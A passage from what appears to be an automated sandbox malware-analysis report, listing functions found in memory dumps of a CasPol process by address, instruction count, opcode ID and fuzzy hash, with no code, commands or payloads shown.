                                                                                                                                    • Instruction Fuzzy Hash: 27325874A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DAA85DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC59208 Relevance: .4, Instructions: 444COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6dbf7d85214441dba05c93c09a0155bea4a4af8eb25bed873c288cac6228cbb3
                                                                                                                                    • Instruction ID: fee21bc4e27829b59644789fcb4726e084ce12903daaddbe30710fada284f200
                                                                                                                                    • Opcode Fuzzy Hash: 6dbf7d85214441dba05c93c09a0155bea4a4af8eb25bed873c288cac6228cbb3
                                                                                                                                    • Instruction Fuzzy Hash: 9EF12934B003158FDB54DFB8C884A9DB7B6AF89354F258665D80AEB3A5DB30EC41CB94
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52DAB Relevance: .4, Instructions: 437COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: fadc7cfaf7b2cc1df4829f8bc6a4a0c711fd4e5cd3e7d9702a78360201b98829
                                                                                                                                    • Instruction ID: b2e1a4f28ee727da75302a74f86b3c8272bf454c41ea7965bdc09c052985efd0
                                                                                                                                    • Opcode Fuzzy Hash: fadc7cfaf7b2cc1df4829f8bc6a4a0c711fd4e5cd3e7d9702a78360201b98829
                                                                                                                                    • Instruction Fuzzy Hash: 13225874A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DA985DA3324DA319F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065DB08 Relevance: .4, Instructions: 437COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6f25f0d7089c00f14ec0fda97af49aa17bdbe2895a3a91400656f2a770595256
                                                                                                                                    • Instruction ID: d0ec001608d361c59d47c4005edf352b5a7857eb53e92aa5ed420e727456123b
                                                                                                                                    • Opcode Fuzzy Hash: 6f25f0d7089c00f14ec0fda97af49aa17bdbe2895a3a91400656f2a770595256
                                                                                                                                    • Instruction Fuzzy Hash: 98E19D30B102258FCB50ABB8C899B9EBBF2AF89360F158569E515DB391DF34DC05CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20655918 Relevance: .4, Instructions: 434COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: ba2462b97528d2494be86819520e3dc6865d4045490e6001859adf3293e59c3a
                                                                                                                                    • Instruction ID: 1c65ed91e0064feb62adf978be613bd58a4021af0e07c82c3a40c4e2b63a2f22
                                                                                                                                    • Opcode Fuzzy Hash: ba2462b97528d2494be86819520e3dc6865d4045490e6001859adf3293e59c3a
                                                                                                                                    • Instruction Fuzzy Hash: 94F15F74A002498FDB10DBA8C4A8BDEBBF1EF49310F20856AD459DB352DB35ED49CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065DA52 Relevance: .4, Instructions: 431COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 25141a2d52d6bf71e617d5acd0f34305b094812f7a24a8000cb36d17bfd721f8
                                                                                                                                    • Instruction ID: 97df242eb557aeb8b06dbeba148df3b0c70fe98119f6a3fc8e94a61b6600ba4e
                                                                                                                                    • Opcode Fuzzy Hash: 25141a2d52d6bf71e617d5acd0f34305b094812f7a24a8000cb36d17bfd721f8
                                                                                                                                    • Instruction Fuzzy Hash: C8E16374F011059BEF308BECC49079E6FA6DB45324F244466E809DB3D2DA75DE89CB92
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52DFF Relevance: .4, Instructions: 427COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bc4f8572beeff7a700f264ffccfca01974c8639091f6b489029f3dc4d091cefd
                                                                                                                                    • Instruction ID: 2a121c5dfe70c34b964564d0d6889fa025bb9f58d4fb2dbc574acd238a37d890
                                                                                                                                    • Opcode Fuzzy Hash: bc4f8572beeff7a700f264ffccfca01974c8639091f6b489029f3dc4d091cefd
                                                                                                                                    • Instruction Fuzzy Hash: 85225874A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DA985DA3324DA319F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC577B8 Relevance: .4, Instructions: 416COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 58fdfa56e8936d103d6d49720f43233dd2720188e9aec64dc732f83e073f2395
                                                                                                                                    • Instruction ID: f55b0ce8d1ffeca8c338b1e3c20892abe73a115e09c484da8b1527276cdc6eef
                                                                                                                                    • Opcode Fuzzy Hash: 58fdfa56e8936d103d6d49720f43233dd2720188e9aec64dc732f83e073f2395
                                                                                                                                    • Instruction Fuzzy Hash: A7E15C35B002198FDB04DBB8C4947AEB7F2AF88354F118529D406DB360EB35ED46DB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52E4A Relevance: .4, Instructions: 415COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 863b864cc3eb8af38af965688b9a765777b9d017253538cb2d6e6131580c1e45
                                                                                                                                    • Instruction ID: 13d172ef9a31fef3ec277cb78b7f8094967cb9be436a475cb328ebac77f02603
                                                                                                                                    • Opcode Fuzzy Hash: 863b864cc3eb8af38af965688b9a765777b9d017253538cb2d6e6131580c1e45
                                                                                                                                    • Instruction Fuzzy Hash: 77225874A15129DFDBA2DB29C848AA9FBF6FB48310F10D1DA985DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52E8C Relevance: .4, Instructions: 407COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c591d2e36abe26678c2c226774be58cfd08e0bed09ce34a0cf6c3df32a9797f6
                                                                                                                                    • Instruction ID: 21fa4b097edd7e207846cc58738182a610c96d6b73045be8deed7ac220776b74
                                                                                                                                    • Opcode Fuzzy Hash: c591d2e36abe26678c2c226774be58cfd08e0bed09ce34a0cf6c3df32a9797f6
                                                                                                                                    • Instruction Fuzzy Hash: FB225774A15129DFDBA1DB29C848AA9FBF6FB48310F10D1DA985DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52ED7 Relevance: .4, Instructions: 397COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: e16b4c991be5075a9054a66b0c8b689bb2144e603ded216d91a5528d4b19ac0b
                                                                                                                                    • Instruction ID: e116ce3664241a12d4813137a48049221dd668a1eb0ed7cb68427664b4908b1d
                                                                                                                                    • Opcode Fuzzy Hash: e16b4c991be5075a9054a66b0c8b689bb2144e603ded216d91a5528d4b19ac0b
                                                                                                                                    • Instruction Fuzzy Hash: 8A125774A15229DFDBA1DB29C848AA8BBF6FB48310F10D1DA985DA3324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52F22 Relevance: .4, Instructions: 387COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 3a0d2aa4baf547e5fe7f1bbf199fa41d872ea2616166e8aa126c21028675858a
                                                                                                                                    • Instruction ID: 813e33476f2c5522c64f1ccd6dabdf3624c2f08fe73db47ae03c354e6fd5aadd
                                                                                                                                    • Opcode Fuzzy Hash: 3a0d2aa4baf547e5fe7f1bbf199fa41d872ea2616166e8aa126c21028675858a
                                                                                                                                    • Instruction Fuzzy Hash: 71124774A15629DFDBA1DB29C848AA8BBF6FB48310F1091DA985DA3324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52F6D Relevance: .4, Instructions: 377COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 33f00f295ebfc154e140e25ec91e08d8648bec42eb3c0bbd63ce5bea53935760
                                                                                                                                    • Instruction ID: a56ae1db9290582170d973c0f8efce394f178bcbb90bff2748aa3deee2ce0aa6
                                                                                                                                    • Opcode Fuzzy Hash: 33f00f295ebfc154e140e25ec91e08d8648bec42eb3c0bbd63ce5bea53935760
                                                                                                                                    • Instruction Fuzzy Hash: 6A124974A15219DFDBA1DF29C848AA8BBF6FB48310F1091DA985DA3324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC52FB8 Relevance: .4, Instructions: 367COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 7dbdb24c7fae1aec439c4af8912df8efc399c91f7897c71b8657232bfaf83a91
                                                                                                                                    • Instruction ID: 9b45355dd1d0a7c12e5a7a90434bf97a1fb6c7b0f907f213e1b2c03062ef67cc
                                                                                                                                    • Opcode Fuzzy Hash: 7dbdb24c7fae1aec439c4af8912df8efc399c91f7897c71b8657232bfaf83a91
                                                                                                                                    • Instruction Fuzzy Hash: 1A124874A15229DFDBA1DF29C848AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53003 Relevance: .4, Instructions: 357COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 816b55afeb60a7732177221e816267829a02a4e1c9e50f12f828264ba1d2684f
                                                                                                                                    • Instruction ID: f331a13fabb404d3f98b9ee048c5536b21671daa1baf6f17189938f59b5002d0
                                                                                                                                    • Opcode Fuzzy Hash: 816b55afeb60a7732177221e816267829a02a4e1c9e50f12f828264ba1d2684f
                                                                                                                                    • Instruction Fuzzy Hash: EC123974A15229DFDBA1DF29C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC557D0 Relevance: .4, Instructions: 352COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: f8e16f88871645d467df719eb460171c90376bedafc14ae5a6861f01fc63408d
                                                                                                                                    • Instruction ID: 42ff3effe51da2a57579f531c984108ad764fd0d19ee48ccd2f41564061e0834
                                                                                                                                    • Opcode Fuzzy Hash: f8e16f88871645d467df719eb460171c90376bedafc14ae5a6861f01fc63408d
                                                                                                                                    • Instruction Fuzzy Hash: 2FD15A75B047568FD700DB68C88069ABBF2FF98314F14892AE449DB265EB34FC06CB95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5304E Relevance: .3, Instructions: 347COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 0daa0895a20abaeff30ffb881d0e9af567d5a15a0653c59d4262a7d02d1f9c4c
                                                                                                                                    • Instruction ID: 9cb9dfe4152465ee35614bf6d9ba0e1ab3b0cd259526a9b8745b2cd8be511489
                                                                                                                                    • Opcode Fuzzy Hash: 0daa0895a20abaeff30ffb881d0e9af567d5a15a0653c59d4262a7d02d1f9c4c
                                                                                                                                    • Instruction Fuzzy Hash: B9023974A15229DFDBA1DF29C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53099 Relevance: .3, Instructions: 337COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d3caf918247804d0f9ab2b546e382414a5f08b62b7365fbbbb2453f29dc7a5b
                                                                                                                                    • Instruction ID: b94ca82f7073d4bb9a1b1dd3044803fc0ad9d5459d02d27798255b3105df92c1
                                                                                                                                    • Opcode Fuzzy Hash: 2d3caf918247804d0f9ab2b546e382414a5f08b62b7365fbbbb2453f29dc7a5b
                                                                                                                                    • Instruction Fuzzy Hash: 1E023974A15219DFDBA2DF28C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC530ED Relevance: .3, Instructions: 327COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6a0d8b7d3c8b235f6e1e75b0ae0f2fcc4d4ac1d305f927a6f47d7f930fe5cbd1
                                                                                                                                    • Instruction ID: 6a20a20d4d250b1d7fba177672ac91a47aae0761e7216b773d5d39ba08a1b9a8
                                                                                                                                    • Opcode Fuzzy Hash: 6a0d8b7d3c8b235f6e1e75b0ae0f2fcc4d4ac1d305f927a6f47d7f930fe5cbd1
                                                                                                                                    • Instruction Fuzzy Hash: A3022974A15219DFDBA1DF29C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC55430 Relevance: .3, Instructions: 321COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6bb105148ba1700fe2360c03b7a5d60a1e066793412f07b020d149d420737284
                                                                                                                                    • Instruction ID: a9ef83a63268ee49eedd7ee8e03157776610386373095e69404716c28e8ee550
                                                                                                                                    • Opcode Fuzzy Hash: 6bb105148ba1700fe2360c03b7a5d60a1e066793412f07b020d149d420737284
                                                                                                                                    • Instruction Fuzzy Hash: 71C18E35B00205DFDB04DBB8C898A9DBBF2AF88354F258569E406DB3A0EB34AD01DB54
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53141 Relevance: .3, Instructions: 317COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c4bd60d4a14355574c8331614911e0e05668cda05a234b73cccca0a8183a9a5d
                                                                                                                                    • Instruction ID: fe9e7e2a7043283fb5278db54f5c49ca16e693a27e0a0fe4878b2e64e30934c0
                                                                                                                                    • Opcode Fuzzy Hash: c4bd60d4a14355574c8331614911e0e05668cda05a234b73cccca0a8183a9a5d
                                                                                                                                    • Instruction Fuzzy Hash: 60F13974A15219DFDBA2DF29C848AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 2065BAA8 Relevance: .3, Instructions: 314COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 19f02f155c3ef31eb0315b8413c0bb93234b3abc1ac843cab20b52a8cae1aef8
                                                                                                                                    • Instruction ID: 3575e2fc0f6520b41735df4c9b1b2cf5ef11ea3760911caa65132e5ab8f3d807
                                                                                                                                    • Opcode Fuzzy Hash: 19f02f155c3ef31eb0315b8413c0bb93234b3abc1ac843cab20b52a8cae1aef8
                                                                                                                                    • Instruction Fuzzy Hash: 38B1E171B042158FEB109BB8C854BAEBBB3EFC4314F24856AD109EB391DE358D459B52
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC53195 Relevance: .3, Instructions: 307COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c829b1b1eabb4c043209e236b915ee7d4a504aaee81003bf979bb02f992f11a3
                                                                                                                                    • Instruction ID: f033c4624d28b6f2bfd7f6153c24f9c27c3333ad082f4f7cf1d698f7c8cfa3fc
                                                                                                                                    • Opcode Fuzzy Hash: c829b1b1eabb4c043209e236b915ee7d4a504aaee81003bf979bb02f992f11a3
                                                                                                                                    • Instruction Fuzzy Hash: 1AF13974A15219DFDBA2DF29C848AA8BBF6FB48310F1091DA985DA7324DA315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC58190 Relevance: .3, Instructions: 305COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d9572b6630b63b94b966742ec6d30b06e0f30d3b4bad6e3d78bdf6c7a171d064
                                                                                                                                    • Instruction ID: 12387515c02389d4edd7fd82c395f7cade5bb0fca39b55ad4eb71c2a49275661
                                                                                                                                    • Opcode Fuzzy Hash: d9572b6630b63b94b966742ec6d30b06e0f30d3b4bad6e3d78bdf6c7a171d064
                                                                                                                                    • Instruction Fuzzy Hash: 03B15035B00615CFDB04DB78C994AAEBBF2AF88310F158529D905D73A4EB34ED02DB55
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC531E9 Relevance: .3, Instructions: 297COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: b72bd7d8d504f8941e9ee5f82802452c0da4b965f312a0f5d92385283afe3999
                                                                                                                                    • Instruction ID: 4d9f851bcc99e4d42e2b86630e955a547c03468c38a39b4d8591a4e2a660ae24
                                                                                                                                    • Opcode Fuzzy Hash: b72bd7d8d504f8941e9ee5f82802452c0da4b965f312a0f5d92385283afe3999
                                                                                                                                    • Instruction Fuzzy Hash: 3EF13974A15219DFDBA2DF29C848AA8BBF6FB48310F1091DA985DA7324DB315F80DF11
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 20653808 Relevance: .3, Instructions: 295COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88425754930.0000000020650000.00000040.00000800.00020000.00000000.sdmp, Offset: 20650000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_20650000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: d9c0d259b772cd159b5bfae1403cc04390dc07522b4936898ee499eb935a4b0e
                                                                                                                                    • Instruction ID: eb034abef1a1259ac2c3eecb806437aa30e0e97bd5a788bdad90bc207649299b
                                                                                                                                    • Opcode Fuzzy Hash: d9c0d259b772cd159b5bfae1403cc04390dc07522b4936898ee499eb935a4b0e
                                                                                                                                    • Instruction Fuzzy Hash: DCB1F271A043618FD715CBB8C88079ABFB1EF86710F2985AAD045CF292E735DD49CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 1FC5323D Relevance: .3, Instructions: 287COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 0000000B.00000002.88424290929.000000001FC50000.00000040.00000800.00020000.00000000.sdmp, Offset: 1FC50000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_11_2_1fc50000_CasPol.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 6d3f949f0baaeea6f7591b386e7cf5e917b368b2667493e4aac8d60d132f930d
                                                                                                                                    • Instruction ID: ed9b86bad2435616bea9d41dad2dd19dda69a1d9cd2fa0ba9071ababdcef221e
